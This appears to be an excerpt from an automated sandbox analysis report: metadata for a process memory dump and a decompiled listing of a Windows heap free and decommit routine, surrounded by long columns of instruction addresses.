                                                                                                                          0x00a8460f
                                                                                                                          0x00a846de
                                                                                                                          0x00a846e3
                                                                                                                          0x00a846e5
                                                                                                                          0x00a846ec
                                                                                                                          0x00a846ee
                                                                                                                          0x00a846f6
                                                                                                                          0x00a846f6
                                                                                                                          0x00a846f6
                                                                                                                          0x00a846f6
                                                                                                                          0x00a846ec
                                                                                                                          0x00a84615
                                                                                                                          0x00a84615
                                                                                                                          0x00a8461d
                                                                                                                          0x00a8462e
                                                                                                                          0x00a8462e
                                                                                                                          0x00a8461d
                                                                                                                          0x00a8460f
                                                                                                                          0x00a84609
                                                                                                                          0x00a846fd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84710
                                                                                                                          0x00a8471a
                                                                                                                          0x00a84720
                                                                                                                          0x00a84720
                                                                                                                          0x00a84722
                                                                                                                          0x00a8472c
                                                                                                                          0x00000000
                                                                                                                          0x00a8472e
                                                                                                                          0x00a8472e
                                                                                                                          0x00000000
                                                                                                                          0x00a8472e
                                                                                                                          0x00a8472c
                                                                                                                          0x00a84738
                                                                                                                          0x00a8473c
                                                                                                                          0x00a8474b
                                                                                                                          0x00a84751
                                                                                                                          0x00a84751
                                                                                                                          0x00000000
                                                                                                                          0x00a8473c
                                                                                                                          0x00a848f4
                                                                                                                          0x00a848f4
                                                                                                                          0x00000000
                                                                                                                          0x00a848f4

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                                          • API String ID: 0-1357697941
                                                                                                                          • Opcode ID: 6b5f35a32b178362b859ce8ca397d3e717c95baad7aaf5b67af7e2d5d151848d
                                                                                                                          • Instruction ID: a9cb12324bd6539d84d8cbd9a4614c165e47c4b01e74e781f6b84ef71474baf3
                                                                                                                          • Opcode Fuzzy Hash: 6b5f35a32b178362b859ce8ca397d3e717c95baad7aaf5b67af7e2d5d151848d
                                                                                                                          • Instruction Fuzzy Hash: 49F12231A00646DFCB25EFA8C495FBAB7F5FF8D704F188029E0469B681D734A985CB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009EA309, Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 72%
                                                                                                                          			E009EA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0xab8a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E009EA830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E009EDF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E009C9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E009CA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0xab8748 - 1;
						if( *0xab8748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E009CB150();
								} else {
									E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E009CB150();
								__eflags =  *0xab7bc8;
								if( *0xab7bc8 == 0) {
									__eflags = 1;
									E00A82073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0xab8748 - 1;
							if( *0xab8748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E009F174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E009E7D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E00A814FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E009C9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E009C9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0xab8748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E009CB150();
											} else {
												E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E009CB150();
											_pop(_t491);
											__eflags =  *0xab7bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E00A82073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E00A8A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E009EA830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E009E7D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E009E7D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E00A81411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E009E7D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E009E7D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0xab8748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E009CB150();
							} else {
								E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E009CB150();
							__eflags =  *0xab7bc8;
							if( *0xab7bc8 == 0) {
								__eflags = 0;
								E00A82073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0xab8748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E009CB150();
												} else {
													E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E009CB150();
												__eflags =  *0xab7bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E00A82073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E00A8A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E009EA830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E009EB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E009EA830(_t553, _v64, _v24);
								_t286 = E009E7D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E009E7D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E00A81411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E009E7D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E009E7D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E00A81411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E009F174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E009EB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E009E7D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E00A814FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E009E99BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E009EA830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E009FABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                                                                                                          0x009ea309
                                                                                                                          0x009ea316
                                                                                                                          0x009ea319
                                                                                                                          0x009ea31d
                                                                                                                          0x009ea32d
                                                                                                                          0x009ea331
                                                                                                                          0x00a31e0d
                                                                                                                          0x00a31e10
                                                                                                                          0x009ea3cb
                                                                                                                          0x009ea3cb
                                                                                                                          0x009ea3bd
                                                                                                                          0x009ea3c3
                                                                                                                          0x009ea3c3
                                                                                                                          0x009ea33a
                                                                                                                          0x00a31e17
                                                                                                                          0x00a31e1b
                                                                                                                          0x00a31e1d
                                                                                                                          0x00a31e2f
                                                                                                                          0x00a31e34
                                                                                                                          0x00a31e36
                                                                                                                          0x00a31e3c
                                                                                                                          0x00a31e3c
                                                                                                                          0x00a31e3c
                                                                                                                          0x00a31e3c
                                                                                                                          0x00a31e36
                                                                                                                          0x00a31e42
                                                                                                                          0x00a31e45
                                                                                                                          0x00a31e47
                                                                                                                          0x009ea3f8
                                                                                                                          0x009ea3f8
                                                                                                                          0x009ea3fb
                                                                                                                          0x009ea3fd
                                                                                                                          0x00a31e50
                                                                                                                          0x009ea403
                                                                                                                          0x009ea411
                                                                                                                          0x009ea411
                                                                                                                          0x009ea411
                                                                                                                          0x009ea41e
                                                                                                                          0x009ea420
                                                                                                                          0x009ea424
                                                                                                                          0x009ea427
                                                                                                                          0x009ea7c9
                                                                                                                          0x009ea7cd
                                                                                                                          0x009ea7d2
                                                                                                                          0x009ea7d9
                                                                                                                          0x009ea7e0
                                                                                                                          0x009ea7e3
                                                                                                                          0x009ea7ed
                                                                                                                          0x009ea7f3
                                                                                                                          0x009ea7f9
                                                                                                                          0x009ea7ff
                                                                                                                          0x009ea802
                                                                                                                          0x009ea807
                                                                                                                          0x009ea809
                                                                                                                          0x009ea809
                                                                                                                          0x009ea809
                                                                                                                          0x009ea80f
                                                                                                                          0x009ea80f
                                                                                                                          0x009ea812
                                                                                                                          0x009ea81c
                                                                                                                          0x009ea821
                                                                                                                          0x009ea824
                                                                                                                          0x009ea42d
                                                                                                                          0x009ea42d
                                                                                                                          0x009ea42d
                                                                                                                          0x009ea42d
                                                                                                                          0x009ea42d
                                                                                                                          0x009ea436
                                                                                                                          0x009ea43a
                                                                                                                          0x009ea609
                                                                                                                          0x009ea60d
                                                                                                                          0x009ea612
                                                                                                                          0x009ea616
                                                                                                                          0x009ea61a
                                                                                                                          0x00a31e57
                                                                                                                          0x00a31e59
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a31e5f
                                                                                                                          0x009ea620
                                                                                                                          0x009ea627
                                                                                                                          0x00a31e64
                                                                                                                          0x00a31e66
                                                                                                                          0x00a31e6c
                                                                                                                          0x00a31e72
                                                                                                                          0x00a31e76
                                                                                                                          0x00a31e95
                                                                                                                          0x00a31e9a
                                                                                                                          0x00a31e78
                                                                                                                          0x00a31e8d
                                                                                                                          0x00a31e92
                                                                                                                          0x00a31ea0
                                                                                                                          0x00a31ea5
                                                                                                                          0x00a31eaa
                                                                                                                          0x00a31eb2
                                                                                                                          0x00a31eb6
                                                                                                                          0x00a31eb9
                                                                                                                          0x00a31eb9
                                                                                                                          0x00a31ebe
                                                                                                                          0x00a31ec2
                                                                                                                          0x00a31ec2
                                                                                                                          0x00a31e66
                                                                                                                          0x009ea62d
                                                                                                                          0x009ea633
                                                                                                                          0x009ea636
                                                                                                                          0x009ea63a
                                                                                                                          0x009ea63c
                                                                                                                          0x009ea640
                                                                                                                          0x009ea642
                                                                                                                          0x009ea644
                                                                                                                          0x009ea644
                                                                                                                          0x009ea644
                                                                                                                          0x009ea64d
                                                                                                                          0x009ea64d
                                                                                                                          0x009ea651
                                                                                                                          0x009ea655
                                                                                                                          0x00a31eca
                                                                                                                          0x00a31ed1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a31ed7
                                                                                                                          0x00000000
                                                                                                                          0x009ea65b
                                                                                                                          0x009ea669
                                                                                                                          0x009ea66e
                                                                                                                          0x009ea670
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009ea676
                                                                                                                          0x009ea67b
                                                                                                                          0x009ea680
                                                                                                                          0x009ea682
                                                                                                                          0x00a31f1a
                                                                                                                          0x009ea688
                                                                                                                          0x009ea688
                                                                                                                          0x009ea688
                                                                                                                          0x009ea68a
                                                                                                                          0x009ea68d
                                                                                                                          0x00a31f24
                                                                                                                          0x00a31f2a
                                                                                                                          0x00a31f31
                                                                                                                          0x00a31f43
                                                                                                                          0x00a31f43
                                                                                                                          0x00a31f31
                                                                                                                          0x009ea693
                                                                                                                          0x009ea697
                                                                                                                          0x009ea69d
                                                                                                                          0x009ea6a0
                                                                                                                          0x009ea6a6
                                                                                                                          0x009ea6a8
                                                                                                                          0x009ea6a8
                                                                                                                          0x009ea6a8
                                                                                                                          0x009ea6a8
                                                                                                                          0x009ea6b2
                                                                                                                          0x009ea6b7
                                                                                                                          0x009ea6c1
                                                                                                                          0x009ea6c6
                                                                                                                          0x009ea6d2
                                                                                                                          0x009ea6d9
                                                                                                                          0x009ea6e3
                                                                                                                          0x009ea6e6
                                                                                                                          0x009ea6eb
                                                                                                                          0x009ea6ed
                                                                                                                          0x009ea6ed
                                                                                                                          0x009ea6ed
                                                                                                                          0x009ea6ed
                                                                                                                          0x009ea6f3
                                                                                                                          0x009ea6f8
                                                                                                                          0x009ea702
                                                                                                                          0x009ea70a
                                                                                                                          0x009ea70e
                                                                                                                          0x009ea71a
                                                                                                                          0x009ea71e
                                                                                                                          0x00a31fcb
                                                                                                                          0x00a31fcf
                                                                                                                          0x00a31fdd
                                                                                                                          0x00a31fe3
                                                                                                                          0x00a31fe3
                                                                                                                          0x009ea724
                                                                                                                          0x009ea728
                                                                                                                          0x009ea72a
                                                                                                                          0x009ea72d
                                                                                                                          0x009ea737
                                                                                                                          0x009ea73a
                                                                                                                          0x009ea73c
                                                                                                                          0x009ea742
                                                                                                                          0x009ea748
                                                                                                                          0x00a31f4d
                                                                                                                          0x00a31f50
                                                                                                                          0x00a31f56
                                                                                                                          0x00a31f5c
                                                                                                                          0x00a31f5f
                                                                                                                          0x00a31f7e
                                                                                                                          0x00a31f83
                                                                                                                          0x00a31f61
                                                                                                                          0x00a31f76
                                                                                                                          0x00a31f7b
                                                                                                                          0x00a31f89
                                                                                                                          0x00a31f8e
                                                                                                                          0x00a31f93
                                                                                                                          0x00a31f94
                                                                                                                          0x00a31f9a
                                                                                                                          0x00a31f9c
                                                                                                                          0x00a31f9e
                                                                                                                          0x00a31fa1
                                                                                                                          0x00a31fa1
                                                                                                                          0x00a31fa6
                                                                                                                          0x00a31fa6
                                                                                                                          0x00a31f50
                                                                                                                          0x009ea74e
                                                                                                                          0x009ea751
                                                                                                                          0x009ea754
                                                                                                                          0x009ea75d
                                                                                                                          0x009ea75e
                                                                                                                          0x009ea762
                                                                                                                          0x009ea767
                                                                                                                          0x00a31faf
                                                                                                                          0x00a31fb0
                                                                                                                          0x00a31fb9
                                                                                                                          0x00a31fbe
                                                                                                                          0x00a31fc2
                                                                                                                          0x00a31fc2
                                                                                                                          0x009ea76d
                                                                                                                          0x009ea76d
                                                                                                                          0x009ea775
                                                                                                                          0x009ea778
                                                                                                                          0x009ea77d
                                                                                                                          0x009ea77d
                                                                                                                          0x009ea71e
                                                                                                                          0x009ea782
                                                                                                                          0x009ea787
                                                                                                                          0x009ea789
                                                                                                                          0x00a31ff3
                                                                                                                          0x009ea78f
                                                                                                                          0x009ea78f
                                                                                                                          0x009ea78f
                                                                                                                          0x009ea791
                                                                                                                          0x009ea794
                                                                                                                          0x00a31ffd
                                                                                                                          0x00a32006
                                                                                                                          0x00a3200c
                                                                                                                          0x00a32017
                                                                                                                          0x00a32019
                                                                                                                          0x00a32024
                                                                                                                          0x00a32024
                                                                                                                          0x00a32024
                                                                                                                          0x00a32047
                                                                                                                          0x00a32047
                                                                                                                          0x00a3200c
                                                                                                                          0x009ea79a
                                                                                                                          0x009ea79f
                                                                                                                          0x009ea7a4
                                                                                                                          0x009ea7a9
                                                                                                                          0x009ea7ab
                                                                                                                          0x00a3205a
                                                                                                                          0x009ea7b1
                                                                                                                          0x009ea7b1
                                                                                                                          0x009ea7b1
                                                                                                                          0x009ea7b3
                                                                                                                          0x009ea7b6
                                                                                                                          0x00000000
                                                                                                                          0x009ea7bc
